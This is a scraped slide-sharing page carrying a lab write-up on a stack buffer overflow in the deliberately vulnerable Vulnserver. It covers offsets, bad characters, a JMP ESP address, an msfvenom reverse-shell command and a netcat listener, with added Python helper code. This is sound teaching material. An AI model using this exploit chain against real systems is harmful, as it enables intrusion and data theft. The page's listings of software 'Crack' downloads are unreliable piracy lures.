How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow
Eric Alleshouse -- Independent Security Researcher
ralleshouse@gmail.com
April 20 2017
How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow
1
Table of Contents
How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow ... 1
Introduction ... 3
Lab setup ... 3
Immunity configuration ... 4
Simple buffer test ... 5
Nmap scan ... 6
Crashing the program ... 7
A unique string ... 7
Pattern Offset ... 9
The bytearray ... 10
Truncation ... 11
JMP ESP ... 12
The final Exploit compiled ... 13
Shell received ... 14
**A special thanks goes out to Aryan Guenthner, Penetration Tester, who has guided and encouraged me to ‘Try Harder’ at succeeding with this project and to produce this report.**
Introduction
Vulnserver is an intentionally vulnerable program introduced by Stephen Bradshaw in 2010. He wrote it as a place to improve his coding abilities and to test shellcode and other exploits. He encourages others to find exploits in the server, but for the purpose of this document I will focus on flooding the memory buffer with shellcode that gives me access to the Windows machine through a shell on my Kali OS. Vulnserver can be downloaded from the GitHub link given in the Lab setup section below.
Lab setup
I’m using the VirtualBox hypervisor with Kali 4.6.4 and Windows 7/IE 8 virtual machines. Installed on the Windows machine are the SLmail POP server and Immunity Debugger, with the mona.py script placed in the Python commands folder within Immunity Debugger. The Windows firewall has been turned off to simulate a real-world security misconfiguration: perhaps the firewall was disabled for troubleshooting purposes and forgotten about, among other scenarios that represent a misconfiguration. This exercise shows a consequence of failing to audit a system: the system is exploited and sensitive files are exposed.
Vulnserver can be downloaded from https://github.com/stephenbradshaw/vulnserver
Kali can be downloaded from http://www.kali.org
Immunity debugger: https://www.immunityinc.com/products/debugger/index.html
Virtualbox: https://www.virtualbox.org/wiki/Downloads
Mona.py (which is inserted into the commands folder in Immunity): https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
Once the VMs are set up, I made sure they are on the ‘host only’ network so they are not exposed to the internet. The VMs should be on the same network and able to ping each other.
As a side note, my host machine is a MacBook Pro, and I have found a limitation with drag and drop between host and guest; the workaround is to create a shared folder on the host that is accessible to the VMs. Netcat will also work to transfer files, but takes a little more time to set up because it is not a native program within Windows.
The goal of the exercise is to redirect EIP to a JMP ESP address, leading the execution flow to shellcode that I injected into memory.
Within Immunity Debugger, set the working folder to c:\logs by issuing the command:
!mona config -set workingfolder c:\logs
All documents created by Mona will be found there.
First, I need to verify the crash of the application by using a poc.py script to fuzz it. The exploit variable sends 2500 ‘A’s to verify that the program is vulnerable to a stack-based buffer overflow.
2500 ‘A’s sent to the server
Here is a snapshot of the whole exploit to start with. It is written in Python and imports the socket module to connect to the remote Vulnserver. It sends 2500 ‘A’s along with the ‘TRUN’ command, which the server is vulnerable to. The server IP is the address of my Windows machine where Vulnserver resides, and the port it uses is 9999, which I found from a simple nmap scan of the IP address.
Initial exploit
Nmap scan of the windows machine
After running this program from the Kali terminal, the result shows that the program crashes and ESP contains many ‘A’s (‘41’ in hex). This shows that the boundary hasn’t been checked, as I can inject my own data into the program and cause it to crash. Each time the program crashes, Vulnserver needs to be restarted and its process attached to Immunity.
In order to find the specific location of ESP, a unique string needs to be sent to the program and the offset located from the debugger.
Use the Immunity command !mona pc 2500 to create a unique string of characters. There is also a tool within Kali that does the same thing, located at:
/usr/share/metasploit-framework/tools/exploit/pattern_create
Copy the unique string into the simple program and send it to Vulnserver, i.e. exploit = 'Aa0Aa1Aa2Aa....' instead of the ‘A’s.
The unique pattern string will be found in the c:\logs working folder after using the mona command.
Or from Kali
Note the exploit was changed from ‘A’s to the unique string created, then sent to Vulnserver to crash it again.
After the crash, locate the value in EIP. The memory address in this case is 396f4338, as indicated by Immunity Debugger. To find its position in the pattern, issue the Immunity command !mona po 396f4338 (or use the Kali tool /usr/share/metasploit-framework/tools/exploit/pattern_offset -q 396f4338 to find its location).
eg. !mona po 396f4338
The pattern offset was found at position 2006, so the exploit changes to offset = 'A'*2006. EIP will be the next 4 bytes in memory, so the buffer now becomes 'A'*2006 + 'B'*4. Run the script to verify control of EIP by noting that the 4 ‘B’s get written to the EIP register; you can see the 4 ‘B’s at the end of the ‘A’s. This is where your JMP ESP address will go a little later.
EIP has 4 ‘B’s written to it
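As an added example (not code from the report), here is the cyclic-pattern logic behind !mona pc / pattern_create and !mona po / pattern_offset, reproducing the numbers above: the EIP value 396f4338, read back as little-endian bytes, is found at offset 2006 of a 2500-byte pattern. The function names are my own.

```python
import struct
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length):
    """Metasploit-style cyclic pattern Aa0Aa1...Aa9Ab0...Zz9, cut to `length` bytes.

    Each aligned 3-byte group (upper, lower, digit) occurs exactly once in the first
    26*26*10*3 = 20280 bytes, so any 4-byte window read back from a register pins
    down the position in the buffer it came from.
    """
    groups = []
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                groups.append(upper + lower + digit)
                if len(groups) * 3 >= length:
                    return "".join(groups)[:length]
    return "".join(groups)[:length]  # caller asked for more than the unique span


def eip_to_bytes(eip_hex):
    """Turn the register value the debugger displays ('396f4338') back into the
    4 bytes that were sitting at the overwritten return address.

    x86 is little-endian: the lowest-addressed byte becomes the least significant
    byte of the register, so 396f4338 came from the bytes 38 43 6f 39 = '8Co9'.
    """
    return struct.pack("<I", int(eip_hex, 16)).decode("latin-1")


def pattern_offset(eip_hex, length=2500):
    """Offset of the 4 bytes now in EIP within a pattern of `length` bytes, or -1 if
    the value did not come from the pattern (EIP was not overwritten by our data)."""
    return pattern_create(length).find(eip_to_bytes(eip_hex))


def build_layout(offset, marker=b"BBBB"):
    """Padding up to the saved return address, then a 4-byte marker that should show
    up in EIP on the next crash: the 'A'*2006 + 'B'*4 check described in the text."""
    return b"A" * offset + marker


if __name__ == "__main__":
    off = pattern_offset("396f4338")
    print("EIP bytes:", eip_to_bytes("396f4338"))
    print("offset:", off)
    print("marker at EIP position:", build_layout(off)[off:off + 4])
```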
Use Immunity !mona bytearray to create a list of all possible byte values. The file will be saved to c:\logs. Copy the string into the program and send this in place of the offset to view any truncation caused by bad characters, and eliminate them one by one until a clean set of characters can be passed to the program without issue. Below, all possible hex characters are illustrated. It is important to remove these bad characters so that the shellcode will run successfully.
Send the bytearray from the exploit: offset = 'A'*2006 + 'B'*4 + badchars, to see if there is any truncation caused by characters from the array. The picture with truncation happening shows that the 00 character is causing problems, indicated by the run of 00’s that follows it.
Truncation
No more truncation after the 00 byte is removed
After the bad character \x00 is removed there is no more truncation. The hex string is successfully inserted into the memory buffer without problems. This byte will be excluded when creating the shellcode with msfvenom later on in the exercise.
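The elimination loop described above, as an added example that is not part of the report: it regenerates the bytearray without the bytes already found bad, compares what was sent with what the debugger shows, and handles the subtlety visible in the truncation screenshot, namely that a \x00 terminator compares equal to zero-filled memory, so the break only becomes visible one byte later. The target's copy behaviour is a constructed stand-in (simulated_copy); its second scenario with an extra terminator goes beyond the page's \x00-only result to show the loop handles several bad bytes. All names are my own.

```python
def make_bytearray(excluded=()):
    """All 256 byte values in ascending order, minus the ones already found bad.
    This is what !mona bytearray writes to the working folder, regenerated per round."""
    skip = set(excluded)
    return bytes(b for b in range(256) if b not in skip)


def first_divergence(sent, observed):
    """Index of the first byte where the debugger's memory view differs from what was
    sent, or None if the whole array arrived intact (a shorter dump counts as a break)."""
    n = min(len(sent), len(observed))
    for i in range(n):
        if sent[i] != observed[i]:
            return i
    return None if len(observed) >= len(sent) else n


def suspect_byte(sent, observed, i):
    """Decide which sent byte caused the divergence at index i.

    The screenshot shows the typical case: a run of 00 bytes after the break. A NUL
    terminator stops the copy, but 0x00 compares equal to zero-filled memory, so the
    first visible mismatch is one byte later; the culprit is the 0x00 just before it.
    Otherwise the byte at the break itself was dropped or replaced.
    """
    if i > 0 and sent[i - 1] == 0x00 and all(b == 0 for b in observed[i:]):
        return 0x00
    return sent[i]


def simulated_copy(payload, terminators=(0x00,)):
    """CONSTRUCTED stand-in for the target: copies the payload like a C string routine,
    stopping at the first terminator byte and leaving the rest of the buffer zeroed.
    In the real exercise the 'observed' data is read from Immunity's memory dump."""
    for i, b in enumerate(payload):
        if b in terminators:
            return payload[:i] + b"\x00" * (len(payload) - i)
    return payload


def find_bad_chars(copy_fn, max_rounds=8):
    """The one-by-one elimination: send the array, find the break, exclude the culprit,
    resend, until the array is reproduced unchanged. Returns the bad bytes found."""
    bad = []
    for _ in range(max_rounds):
        sent = make_bytearray(bad)
        observed = copy_fn(sent)
        i = first_divergence(sent, observed)
        if i is None:
            return bad
        bad.append(suspect_byte(sent, observed, i))
    raise RuntimeError("too many rounds; the target may be altering bytes non-deterministically")


if __name__ == "__main__":
    print("bad chars (\\x00 terminator only):", find_bad_chars(simulated_copy))
    print("bad chars (constructed \\x00 and \\x0a case):",
          find_bad_chars(lambda p: simulated_copy(p, terminators=(0x00, 0x0a))))
```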
Use Immunity !mona modules -o to find the modules loaded by Vulnserver that are suitable for locating a JMP ESP. ASLR and DEP are security protections that get in the way of reusing a JMP ESP address (ASLR randomizes the address a module loads at), so modules with these protections active should not be selected. There are instances where they are not used because common program instructions need to use them. I chose essfunc.dll. The -o option filters out the operating system modules to whittle the module list down to relevant listings.
Use Immunity !mona find -s '\xff\xe4' -m .dll to find the location of a JMP ESP instruction (\xff\xe4 is the opcode for JMP ESP).
I verify the address contains a JMP ESP by searching for that memory address in the debugger.
The JMP ESP in my case is located at 625011af. Written in little-endian format, it becomes '\xaf\x11\x50\x62' in the exploit. I replace the 'B's with the JMP ESP address in little-endian format.
Since I control EIP, I can direct it to the JMP ESP address, slide down some no-operation instructions and fall into the shellcode.
To create a payload in Kali without the bad characters and insert it as a variable in the script, I type:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.102 LPORT=443 -f py -a x86 --platform windows -b '\x00'
The exploit becomes exploit = offset + JMP ESP + nops + buf, where:
offset is the memory just before EIP;
JMP ESP is the address written into EIP;
buf is the shellcode created in Kali, which contains my reverse TCP shell (in this case only a snippet of the shellcode is shown);
nops are sent to create a little space and be sure that the shellcode gets run in the memo
Final exploit
Set up a netcat listener in Kali so the Windows machine has a place to connect to: nc -lvp 443
Send the exploit (./poc.py) to Vulnserver.
A shell is gained on the compromised Windows machine by exploiting a vulnerability in Vulnserver’s programming. There was no boundary check on the user input, so I was able to make the program crash and gain entry to the system. The next phase of the process is post-exploitation, where I can perform data exfiltration and move laterally through various machines on the network. Other useful information can be gained from other computers, printers, and routers.
System information gathered
How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow
14
How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow
15
Ad

More Related Content

What's hot (19)

Metasploit
MetasploitMetasploit
Metasploit
Raghunath G
 
Security Applications For Emulation
Security Applications For EmulationSecurity Applications For Emulation
Security Applications For Emulation
Silvio Cesare
 
Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android Demo
Arpit Agarwal
 
Reverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsReverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentals
Eran Goldstein
 
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware TriageЭкспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
Positive Hack Days
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
phanleson
 
sponsorAVAST-VB2014
sponsorAVAST-VB2014sponsorAVAST-VB2014
sponsorAVAST-VB2014
Martin Hron
 
Audit
AuditAudit
Audit
Mark Ellzey Thomas
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
Tom Eston
 
Valgrind debugger Tutorial
Valgrind debugger TutorialValgrind debugger Tutorial
Valgrind debugger Tutorial
Anurag Tomar
 
2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoret2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoret
Karel Javůrek
 
Exploit techniques and mitigation
Exploit techniques and mitigationExploit techniques and mitigation
Exploit techniques and mitigation
Yaniv Shani
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014
Bryce Kunz
 
Intimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkIntimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit Framework
Animesh Roy
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Exploiting buffer overflows
Exploiting buffer overflowsExploiting buffer overflows
Exploiting buffer overflows
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
hughpearse
 
Better Embedded 2013 - Detecting Memory Leaks with Valgrind
Better Embedded 2013 - Detecting Memory Leaks with ValgrindBetter Embedded 2013 - Detecting Memory Leaks with Valgrind
Better Embedded 2013 - Detecting Memory Leaks with Valgrind
Rigels Gordani
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Elvin Gentiles
 
Security Applications For Emulation
Security Applications For EmulationSecurity Applications For Emulation
Security Applications For Emulation
Silvio Cesare
 
Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android Demo
Arpit Agarwal
 
Reverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsReverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentals
Eran Goldstein
 
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware TriageЭкспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
Positive Hack Days
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
phanleson
 
sponsorAVAST-VB2014
sponsorAVAST-VB2014sponsorAVAST-VB2014
sponsorAVAST-VB2014
Martin Hron
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
Tom Eston
 
Valgrind debugger Tutorial
Valgrind debugger TutorialValgrind debugger Tutorial
Valgrind debugger Tutorial
Anurag Tomar
 
2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoret2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoret
Karel Javůrek
 
Exploit techniques and mitigation
Exploit techniques and mitigationExploit techniques and mitigation
Exploit techniques and mitigation
Yaniv Shani
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014
Bryce Kunz
 
Intimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkIntimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit Framework
Animesh Roy
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
hughpearse
 
Better Embedded 2013 - Detecting Memory Leaks with Valgrind
Better Embedded 2013 - Detecting Memory Leaks with ValgrindBetter Embedded 2013 - Detecting Memory Leaks with Valgrind
Better Embedded 2013 - Detecting Memory Leaks with Valgrind
Rigels Gordani
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Elvin Gentiles
 

Similar to Vulnserver bufferoverflow (20)

Slmail Buffer Overflow
Slmail Buffer OverflowSlmail Buffer Overflow
Slmail Buffer Overflow
Eric alleshouse
 
Writing simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsWriting simple buffer_overflow_exploits
Writing simple buffer_overflow_exploits
D4rk357 a
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggy
Andrey Karpov
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
NETWAYS
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Rodolpho Concurde
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Tamas K Lengyel
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
Evgeni Tsonev
 
Linux synchronization tools
Linux synchronization toolsLinux synchronization tools
Linux synchronization tools
mukul bhardwaj
 
Testing Terraform
Testing TerraformTesting Terraform
Testing Terraform
Nathen Harvey
 
Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1
Venkat Raman
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
Finding bugs in the code of LLVM project with the help of PVS-Studio
Finding bugs in the code of LLVM project with the help of PVS-StudioFinding bugs in the code of LLVM project with the help of PVS-Studio
Finding bugs in the code of LLVM project with the help of PVS-Studio
PVS-Studio
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggy
PVS-Studio
 
PVS-Studio Meets Octave
PVS-Studio Meets Octave PVS-Studio Meets Octave
PVS-Studio Meets Octave
PVS-Studio
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
JongWon Kim
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysis
Tamas K Lengyel
 
BSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysisBSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysis
Tamas K Lengyel
 
CVE-2014-4113
CVE-2014-4113CVE-2014-4113
CVE-2014-4113
Rajivarnan (Rajiv)
 
Writing simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsWriting simple buffer_overflow_exploits
Writing simple buffer_overflow_exploits
D4rk357 a
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggy
Andrey Karpov
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
NETWAYS
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Rodolpho Concurde
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Tamas K Lengyel
 
Linux synchronization tools
Linux synchronization toolsLinux synchronization tools
Linux synchronization tools
mukul bhardwaj
 
Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1
Venkat Raman
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
Finding bugs in the code of LLVM project with the help of PVS-Studio
Finding bugs in the code of LLVM project with the help of PVS-StudioFinding bugs in the code of LLVM project with the help of PVS-Studio
Finding bugs in the code of LLVM project with the help of PVS-Studio
PVS-Studio
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggy
PVS-Studio
 
PVS-Studio Meets Octave
PVS-Studio Meets Octave PVS-Studio Meets Octave
PVS-Studio Meets Octave
PVS-Studio
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
JongWon Kim
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysis
Tamas K Lengyel
 
BSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysisBSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysis
Tamas K Lengyel
 
Ad

Recently uploaded (20)

Expand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchangeExpand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchange
Fexle Services Pvt. Ltd.
 
WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)
sh607827
 
Not So Common Memory Leaks in Java Webinar
Not So Common Memory Leaks in Java WebinarNot So Common Memory Leaks in Java Webinar
Not So Common Memory Leaks in Java Webinar
Tier1 app
 
Automation Techniques in RPA - UiPath Certificate
Automation Techniques in RPA - UiPath CertificateAutomation Techniques in RPA - UiPath Certificate
Automation Techniques in RPA - UiPath Certificate
VICTOR MAESTRE RAMIREZ
 
Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025
mu394968
 
Revolutionizing Residential Wi-Fi PPT.pptx
Revolutionizing Residential Wi-Fi PPT.pptxRevolutionizing Residential Wi-Fi PPT.pptx
Revolutionizing Residential Wi-Fi PPT.pptx
nidhisingh691197
 
Why Orangescrum Is a Game Changer for Construction Companies in 2025
Why Orangescrum Is a Game Changer for Construction Companies in 2025Why Orangescrum Is a Game Changer for Construction Companies in 2025
Why Orangescrum Is a Game Changer for Construction Companies in 2025
Orangescrum
 
Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]
saniaaftab72555
 
Top 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docxTop 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docx
Portli
 
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage DashboardsAdobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
BradBedford3
 
Adobe After Effects Crack FREE FRESH version 2025
Adobe After Effects Crack FREE FRESH version 2025Adobe After Effects Crack FREE FRESH version 2025
Adobe After Effects Crack FREE FRESH version 2025
kashifyounis067
 
How can one start with crypto wallet development.pptx
How can one start with crypto wallet development.pptxHow can one start with crypto wallet development.pptx
How can one start with crypto wallet development.pptx
laravinson24
 
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Eric D. Schabell
 
Microsoft AI Nonprofit Use Cases and Live Demo_2025.04.30.pdf
Microsoft AI Nonprofit Use Cases and Live Demo_2025.04.30.pdfMicrosoft AI Nonprofit Use Cases and Live Demo_2025.04.30.pdf
Microsoft AI Nonprofit Use Cases and Live Demo_2025.04.30.pdf
TechSoup
 
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
Egor Kaleynik
 
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
steaveroggers
 
Adobe Master Collection CC Crack Advance Version 2025
Adobe Master Collection CC Crack Advance Version 2025Adobe Master Collection CC Crack Advance Version 2025
Adobe Master Collection CC Crack Advance Version 2025
kashifyounis067
 
Kubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptxKubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptx
CloudScouts
 
Adobe Illustrator Crack FREE Download 2025 Latest Version
Adobe Illustrator Crack FREE Download 2025 Latest VersionAdobe Illustrator Crack FREE Download 2025 Latest Version
Adobe Illustrator Crack FREE Download 2025 Latest Version
kashifyounis067
 
Secure Test Infrastructure: The Backbone of Trustworthy Software Development
Secure Test Infrastructure: The Backbone of Trustworthy Software DevelopmentSecure Test Infrastructure: The Backbone of Trustworthy Software Development
Secure Test Infrastructure: The Backbone of Trustworthy Software Development
Shubham Joshi
 
Expand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchangeExpand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchange
Fexle Services Pvt. Ltd.
 
WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)
sh607827
 
Not So Common Memory Leaks in Java Webinar
Not So Common Memory Leaks in Java WebinarNot So Common Memory Leaks in Java Webinar
Not So Common Memory Leaks in Java Webinar
Tier1 app
 
Automation Techniques in RPA - UiPath Certificate
Automation Techniques in RPA - UiPath CertificateAutomation Techniques in RPA - UiPath Certificate
Automation Techniques in RPA - UiPath Certificate
VICTOR MAESTRE RAMIREZ
 
Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025
mu394968
 
Revolutionizing Residential Wi-Fi PPT.pptx
Revolutionizing Residential Wi-Fi PPT.pptxRevolutionizing Residential Wi-Fi PPT.pptx
Revolutionizing Residential Wi-Fi PPT.pptx
nidhisingh691197
 
Vulnserver buffer overflow

How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow

Eric Alleshouse -- Independent Security Researcher
[email protected]
April 20 2017
Table of Contents

How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow ... 1
Introduction ... 3
Lab setup ... 3
Immunity configuration ... 4
Simple buffer test ... 5
Nmap scan ... 6
Crashing the program ... 7
A unique string ... 7
Pattern Offset ... 9
The bytearray ... 10
Truncation ... 11
JMP ESP ... 12
The final Exploit compiled ... 13
Shell received ... 14
**A special thanks goes out to Aryan Guenthner, Penetration Tester, who has guided and encouraged me to 'Try Harder' at succeeding with this project and to produce this report.**

Introduction

